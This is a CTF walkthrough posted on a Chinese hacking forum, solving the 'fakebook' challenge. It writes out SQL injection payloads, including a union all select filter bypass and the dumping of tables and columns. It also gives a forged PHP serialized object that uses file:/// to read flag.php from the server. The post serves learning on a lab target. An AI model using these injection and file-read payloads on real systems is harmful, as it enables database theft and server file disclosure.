跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方


HACK1949

推荐的帖子

这关一进来一个登录框,一个注册框,题目没给什么提示

先注册一个试试(但是注册完之后退不回去了 需要重新开一个浏览器)

注册完随便点一点,发现URL有点异样

http://111.200.241.244:54356/view.php?no=1

看起来又是个SQL注入 先加个单引号——果然报错了

2933891-20220814122322351-582699160.png

接着用order by 测试出来有四个字段

常规的联合查询注入搞一下union select(我猜应该没这么简单)

2933891-20220814122344798-714701413.png

但是!union select 不行 ,我们试试union all select(成功绕过)

2933891-20220814122402500-1569896542.png

 

 

?no=0 union all select 1,database(),3,4 --+ 数据库名fakebook

?no=0 union all select 1,group_concat(table_name),3,4 from information_schema.tables --+ 拿到所有表名字

?no=0 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+ 字段名users

?no=0 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+ 字段值 no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

?no=0 union all select 1,group_concat(data),3,4 from users--+

这里得到了一串序列化的值,感觉有点懵逼,这不是我自己注册的信息吗?

O:8:"UserInfo":3:

{s:4:"name";s:3:"abc";s:3:"age";i:123;s:4:"blog";s:10:"www.bb.com";}

 

那么这关考的不光是SQL注入了 重新理一下思路,扔到御剑里跑一跑

发现有flag.php和robots.txt。访问robots.txt

2933891-20220814122423550-524609973.png

访问/user.php.bak 直接下载了一个文件 打开看一下是个php代码

 

这里彻底不会了 看下大佬的思路

通过构造反序列化语句,使用file协议去读取/var/www/html/flag.php的内容(file协议主要用于访问计算机本地文件,基本格式为:file:///文件路径)

构造出以下payload:

?no=0 union all%20select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"abc";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

2933891-20220814122456861-1735733639.png

 

 

右键查看源码

2933891-20220814122506304-1716725348.png

 

 

 2933891-20220814122514895-594182427.png

 

参考链接

https://blog.csdn.net/qq_41500251/article/details/105383065?spm=1001.2101.3001.6650.4&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-4-105383065-blog-104868401.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-4-105383065-blog-104868401.pc_relevant_default&utm_relevant_index=5

 

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...